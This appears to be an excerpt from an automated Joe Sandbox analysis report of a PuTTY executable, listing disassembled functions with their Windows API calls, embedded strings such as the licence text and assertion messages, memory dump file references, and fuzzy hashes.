Instruction Fuzzy Hash: E4F0B4B1A8D224AFEA211B44BE0EB6E36A4EB06B18F044075FD04B71E0CFA10952D795

Function 00C5E7A7 Relevance: 9.3, APIs: 6, Instructions: 298COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9eb470a77098bd54b0f54baab2996deba9915698081da13529ffcc2245519f6b
Instruction ID: 38e301a5d715ee337279455c4b029bba7b05e0032668952427055a9d995109d8
Opcode Fuzzy Hash: 9eb470a77098bd54b0f54baab2996deba9915698081da13529ffcc2245519f6b
Instruction Fuzzy Hash: 22B1F978E002499FDF19DFA9C880BAD7BB1BF45305F148159E8119B292C7709F89DB68

Function 00C65624 Relevance: 9.2, APIs: 6, Instructions: 248COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,?,?,?,00C6560F,?,?,?,?,?,?,?,?,?), ref: 00C656CA
__freea.LIBCMT ref: 00C6585F
__freea.LIBCMT ref: 00C65865
__freea.LIBCMT ref: 00C6589B
__freea.LIBCMT ref: 00C658A1
__freea.LIBCMT ref: 00C658B1

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: __freea$Info
String ID:
API String ID: 541289543-0
Opcode ID: 1d5722f2a88706f57b6984ca6fb58b51dbe79564f1349d6a8f1a39ac2e4d9bd1
Instruction ID: 7832556468e71c3818f2e8e22c8df084d06b0ace4f0ed8f4b3cead2dd300d3fa
Opcode Fuzzy Hash: 1d5722f2a88706f57b6984ca6fb58b51dbe79564f1349d6a8f1a39ac2e4d9bd1
Instruction Fuzzy Hash: A471D076D40A0AABDF319EA4CCC1BAE77BA9F49310F380059FC14A72C1E6359E45C7A5

Function 00BA6FF0 Relevance: 9.1, APIs: 6, Instructions: 116COMMON

Download Yara Rule

APIs

SelectObject.GDI32 ref: 00BA70C5
GetCharWidth32W.GDI32(?,?), ref: 00BA70D6
GetCharWidthW.GDI32(?,?), ref: 00BA70EA
SelectObject.GDI32(?), ref: 00BA7113
GetCharWidth32A.GDI32 ref: 00BA7124
GetCharWidthA.GDI32 ref: 00BA7138

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Char$ObjectSelectWidthWidth32
String ID:
API String ID: 4136774150-0
Opcode ID: e8acdbd6a2810cfaa567e303c9025140fcf0bf24cd240049ca236a7c77aadf84
Instruction ID: 1fff53c7eee4928ed93f0ff5a25fbb5cf0c50dd289748168075330320ca5e0f3
Opcode Fuzzy Hash: e8acdbd6a2810cfaa567e303c9025140fcf0bf24cd240049ca236a7c77aadf84
Instruction Fuzzy Hash: A431E5F168C0249FD7284714DC9AB2E7BEAEB47324F140176F455DA3B0CA69CC41E7A1

Function 00BC3ED0 Relevance: 9.1, APIs: 6, Instructions: 90COMMON

Download Yara Rule

APIs

CreateFontA.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000001,?), ref: 00BC3F41
GetDC.USER32(00000000), ref: 00BC3F4B
SelectObject.GDI32(00000000,00000000), ref: 00BC3F59
GetTextMetricsA.GDI32(00000000), ref: 00BC3F67
ReleaseDC.USER32(00000000,00000000), ref: 00BC3F87
DeleteObject.GDI32(00000000), ref: 00BC3F92

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Object$CreateDeleteFontMetricsReleaseSelectText
String ID:
API String ID: 4134816134-0
Opcode ID: 966466f3dd37fecbc547b5db4698c01da33ba399205adc36ce46792f1f400fe7
Instruction ID: 2b389b5fe4671fac70c06e85e70ed59f75459e4d51fbf6e0cec15808df99d8a0
Opcode Fuzzy Hash: 966466f3dd37fecbc547b5db4698c01da33ba399205adc36ce46792f1f400fe7
Instruction Fuzzy Hash: 7421F931F452106BD7201B209C99F7F7BE4EB42F51F89447DFD49EB290DA518D0182A2

Function 00C54080 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00C54077,00C409F3,00C40679), ref: 00C5408E
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C5409C
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C540B5
SetLastError.KERNEL32(00000000,00C54077,00C409F3,00C40679), ref: 00C54107

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 63f2ad7e6436c30779b1b6d0e96318bb361a146c1da4a9bb529fac86923e34e5
Instruction ID: 213eaa7440a2fad40d7a60e66c2cd4043b5487092914e32a1d00738a78a56288
Opcode Fuzzy Hash: 63f2ad7e6436c30779b1b6d0e96318bb361a146c1da4a9bb529fac86923e34e5
Instruction Fuzzy Hash: 4001B53A2087216EA73826796C85B5F2654EB5337B734033EFF20821F1EE514CC9A248

Function 00BA9A20 Relevance: 9.0, APIs: 6, Instructions: 47COMMON

Download Yara Rule

APIs

CreatePen.GDI32(00000000,00000000,?), ref: 00BA9A55
SelectObject.GDI32(00000000), ref: 00BA9A68
MoveToEx.GDI32(?,?,00000000), ref: 00BA9A7B
LineTo.GDI32(?,?), ref: 00BA9A8C
SelectObject.GDI32(00000000), ref: 00BA9A99
DeleteObject.GDI32(00000000), ref: 00BA9A9C

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Object$Select$CreateDeleteLineMove
String ID:
API String ID: 3907703346-0
Opcode ID: 5e40686e4dc256906d4fc9d26f0303d813f3588f428a6735712ae3259261c16f
Instruction ID: 7169864ebe3117a6b4b5160c7d35908d96f3f7fe638aafc0478ea22eb3fcc7aa
Opcode Fuzzy Hash: 5e40686e4dc256906d4fc9d26f0303d813f3588f428a6735712ae3259261c16f
Instruction Fuzzy Hash: D101F7B3905124AFCB210B50EE0AF4EBFA9FB8B724F01012AF608D3530C6279D11AB50

Function 00BC9FC0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00BCA076
_strlen.LIBCMT ref: 00BCA09A
_strlen.LIBCMT ref: 00BCA0CD
_strspn.LIBCMT ref: 00BCA109

Strings

0123456789, xrefs: 00BCA103

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: _strlen$_strspn
String ID: 0123456789
API String ID: 3953159543-2793719750
Opcode ID: 4a70bbcc8b5500658786e4eb1411d61154eedabdc606c9b54565332ee66d0c4d
Instruction ID: e54b75bd9f8646cbb363c233aec60bd012f312083d3704898610894c4cd69bdd
Opcode Fuzzy Hash: 4a70bbcc8b5500658786e4eb1411d61154eedabdc606c9b54565332ee66d0c4d
Instruction Fuzzy Hash: 3151A7B4900204AFD620AF24DC46F17B7A9EF9934CF14446CF54A9B342E633ED55CB92

Function 00C304A0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 129libraryloaderCOMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00C304B6
GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00C3052A

Strings

%02x, xrefs: 00C305B6
CryptProtectMemory, xrefs: 00C30524
crypt32.dll, xrefs: 00C3050E

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: AddressProc_strlen
String ID: %02x$CryptProtectMemory$crypt32.dll
API String ID: 480852294-4241872374
Opcode ID: c4b31c48a3dbb6531b1f979a5a7dd95d9fed7203d37de8c46afea1c15cfd7923
Instruction ID: 2f6f0c62bf47a4ea50d46a93d8f1ba1078d86211d65dd3a546011bb682c78872
Opcode Fuzzy Hash: c4b31c48a3dbb6531b1f979a5a7dd95d9fed7203d37de8c46afea1c15cfd7923
Instruction Fuzzy Hash: 9A3108F2950700ABD7106774AC4AF1F3AD89F52708F084474F8099B283F625DA14CB67

Function 00BBF260 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BE9BE0: GetLocalTime.KERNEL32(?,?,?,?,00BC50A4,?), ref: 00BE9BF6

_strftime.LIBCMT ref: 00BBF289
SendDlgItemMessageA.USER32(?,000003E9,00000180,00000000,00000000), ref: 00BBF308
SendDlgItemMessageA.USER32(000003E9,0000018B,00000000,00000000), ref: 00BBF31E
SendDlgItemMessageA.USER32(000003E9,00000197,-000000FF,00000000), ref: 00BBF336

Strings

%Y-%m-%d %H:%M:%S, xrefs: 00BBF281

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ItemMessageSend$LocalTime_strftime
String ID: %Y-%m-%d %H:%M:%S
API String ID: 3243744690-819171244
Opcode ID: 6872237670da7371bff0d4920f90fbdc01c961e4008f20de7f5cbcc3d5397479
Instruction ID: c2e7aec024f49c6e161f7f0794ada0d00a024fce1fe312326df646f5cf9553db
Opcode Fuzzy Hash: 6872237670da7371bff0d4920f90fbdc01c961e4008f20de7f5cbcc3d5397479
Instruction Fuzzy Hash: BF311676600200EFE7049B34EC93B7E37E5EB8B708F144669F901DB2D1D7B1A9059B81

Function 00BC39A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 85windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32(?,?,00000190,00000000,00000000), ref: 00BC3A34
SendDlgItemMessageA.USER32(?,?,00000188,00000000,00000000), ref: 00BC3A65

Strings

/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c, xrefs: 00BC39EB, 00BC3A10
c && c->ctrl->type == CTRL_LISTBOX, xrefs: 00BC39F0
c->ctrl->listbox.height != 0, xrefs: 00BC3A15

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ItemMessageSend
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$c && c->ctrl->type == CTRL_LISTBOX$c->ctrl->listbox.height != 0
API String ID: 3015471070-1665001371
Opcode ID: 137922f5aba2623cd456284b251afe8a0510414927a63a709437011dee056ce6
Instruction ID: a563b02b42015cf09e88f5e755cfa9a5fca90cd5472b8be0ccc554e9320c1be0
Opcode Fuzzy Hash: 137922f5aba2623cd456284b251afe8a0510414927a63a709437011dee056ce6
Instruction Fuzzy Hash: CB21DF71240204EFEB208A18CC8AF2673E4FB05B25F5142A9F449DB1E1DBB1ED64C754

Function 00BA1A71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78windowCOMMON

Download Yara Rule

APIs

ShowCursor.USER32(00000001), ref: 00BA1A91
MessageBoxA.USER32(?,00000000,00000000,00000031), ref: 00BA1B16
DestroyWindow.USER32 ref: 00BA1B22

Strings

Are you sure you want to close this session?%s%s, xrefs: 00BA1AE5
%s Exit Confirmation, xrefs: 00BA1AA4

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: CursorDestroyMessageShowWindow
String ID: %s Exit Confirmation$Are you sure you want to close this session?%s%s
API String ID: 1466741823-1096320758
Opcode ID: 6f8f3e08023a46550aeb3861198e22a101c1258635e4dccc9ffd8dd8d688d55c
Instruction ID: 51d945079c6d822d8ff93b054cab66f79cc6d4816e3b427b53121e7b911db9ba
Opcode Fuzzy Hash: 6f8f3e08023a46550aeb3861198e22a101c1258635e4dccc9ffd8dd8d688d55c
Instruction Fuzzy Hash: A7216BB5A041006FDF547764BC5AB2E36C5DB9730DF0404B9F9068A392FD628D06D7A2

Function 00BA5F20 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 76fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32(?,00000004,00000000,00000000), ref: 00BA5F69
UnmapViewOfFile.KERNEL32(00000000), ref: 00BA5FAB
CloseHandle.KERNEL32(?), ref: 00BA5FB5

Strings

%p:%u, xrefs: 00BA5F49
Serialised configuration data was invalid, xrefs: 00BA5FD7

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: FileView$CloseHandleUnmap
String ID: %p:%u$Serialised configuration data was invalid
API String ID: 2927507641-1340088990
Opcode ID: ae74f1d1fe0b88df4542c09cec18204ec146b019aab85833795ee349fccdebbe
Instruction ID: fc303212453ad15d701ab0bb5a6f18aacffed0823957e09c9d37771141391484
Opcode Fuzzy Hash: ae74f1d1fe0b88df4542c09cec18204ec146b019aab85833795ee349fccdebbe
Instruction Fuzzy Hash: 8A11B270A08301AFD7249F54DC8AB2FB7E4EF85700F00486DF9858A390DB719D08DB92

Function 00BD62B0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 72COMMON

Download Yara Rule

APIs

htonl.WS2_32(?), ref: 00BD6355

Strings

/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/network.c, xrefs: 00BD62DB, 00BD633E, 00BD6366
family != AF_UNSPEC, xrefs: 00BD62E0
false && "bad address family in sk_addrcopy", xrefs: 00BD636B
addr->addresses && step.curraddr < addr->naddresses, xrefs: 00BD6343

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: htonl
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/network.c$addr->addresses && step.curraddr < addr->naddresses$false && "bad address family in sk_addrcopy"$family != AF_UNSPEC
API String ID: 2009864989-3860342078
Opcode ID: f61203921172c2d6fa24ff62b3ee76ca6680142aae70595b243592f2f013fbf1
Instruction ID: 59c44a5659489f4963ab461d02c70fbe1d17fa2aca6fa8a19901e3986259701c
Opcode Fuzzy Hash: f61203921172c2d6fa24ff62b3ee76ca6680142aae70595b243592f2f013fbf1
Instruction Fuzzy Hash: 4C218CB4600701DFCB24CF0DD585A2AF7E1FB55720B1988AAEC998B781E770EC40CB66

Function 00C61241 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,00C61304,?,?,00CA5AE8,00000000,?,00C61214,00000004,InitializeCriticalSectionEx,00C7D778,00C7D780,00000000), ref: 00C612D2

Strings

api-ms-, xrefs: 00C61292

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 034fad2b510827edbfd3438cb26ea6847d0b82407c98036f5f884054ebe97281
Instruction ID: bfc9ebfe10e63f96f9c294057bb037310d36d2a768bb87d3f8b5971babc8dbb1
Opcode Fuzzy Hash: 034fad2b510827edbfd3438cb26ea6847d0b82407c98036f5f884054ebe97281
Instruction Fuzzy Hash: 8811A732A01625ABCF329B69DC9875D33949F01776F1D0221ED25EB2C0D7A0EF0186D1

Function 00BD5220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000000,00000000,00000000,00000000,00000000,00000002,00000000,?,00BD4D9B), ref: 00BD525B
DeleteFileA.KERNEL32(00000000,00000002,00000000,?,00BD4D9B), ref: 00BD526C
GetLastError.KERNEL32 ref: 00BD5276
GetLastError.KERNEL32 ref: 00BD5281

Strings

Unable to delete '%s': %s, xrefs: 00BD5292

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ErrorFileLast$CreateDelete
String ID: Unable to delete '%s': %s
API String ID: 3657518308-26304762
Opcode ID: dcd3bd3fa30ed647dbf60f95427756802c15352d545cd1840078b68a701a7e05
Instruction ID: 06a28332cccb5519c6a378cc4545f0b3f0a06c5713a143f66eff3c1392e49fe8
Opcode Fuzzy Hash: dcd3bd3fa30ed647dbf60f95427756802c15352d545cd1840078b68a701a7e05
Instruction Fuzzy Hash: 180149B62002166FE7202B345C8EB6F779CEB85724F28067EF423C22C0F7204D128669

Function 00C4C420 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,A5F18998,?,?,00000000,00C68094,000000FF,?,00C4C4EA,00C4C385,?,00C4C586,00000000), ref: 00C4C455
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C4C467
FreeLibrary.KERNEL32(00000000,?,?,00000000,00C68094,000000FF,?,00C4C4EA,00C4C385,?,00C4C586,00000000), ref: 00C4C489

Strings

mscoree.dll, xrefs: 00C4C44E
CorExitProcess, xrefs: 00C4C45F

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: d9e8794d32fbec91f302eb136e2bf97e89f51d79ab386342dc0ebee638e70f34
Instruction ID: 17463755f880e627974eee7c3ba2e3ea904539a486fe14f375720873aa1ec879
Opcode Fuzzy Hash: d9e8794d32fbec91f302eb136e2bf97e89f51d79ab386342dc0ebee638e70f34
Instruction Fuzzy Hash: 4201A232911615EFDB118F54CC49BBEB7B8FF44B14F004639E821E22A0DB749A00CAA0

Function 00BBF780 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

SetWindowTextA.USER32(?,00000000), ref: 00BBF7B6
SetDlgItemTextA.USER32(?,000003EA,PuTTY is copyright 1997-2024 Simon Tatham.Portions copyright Robert de Bath, Joris van Rantwijk, Delian Delchev, Andreas Schultz, Jeroen Massar, Wez Furlong, Nicolas Barry, Justin Bradford, Ben Harris, Malcolm Smith, Ahmad Khalifa, Markus Kuhn, Colin Watso), ref: 00BBF7D0
EndDialog.USER32(?,00000001), ref: 00BBF7ED

Strings

%s Licence, xrefs: 00BBF7A5
PuTTY is copyright 1997-2024 Simon Tatham.Portions copyright Robert de Bath, Joris van Rantwijk, Delian Delchev, Andreas Schultz, Jeroen Massar, Wez Furlong, Nicolas Barry, Justin Bradford, Ben Harris, Malcolm Smith, Ahmad Khalifa, Markus Kuhn, Colin Watso, xrefs: 00BBF7C5

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

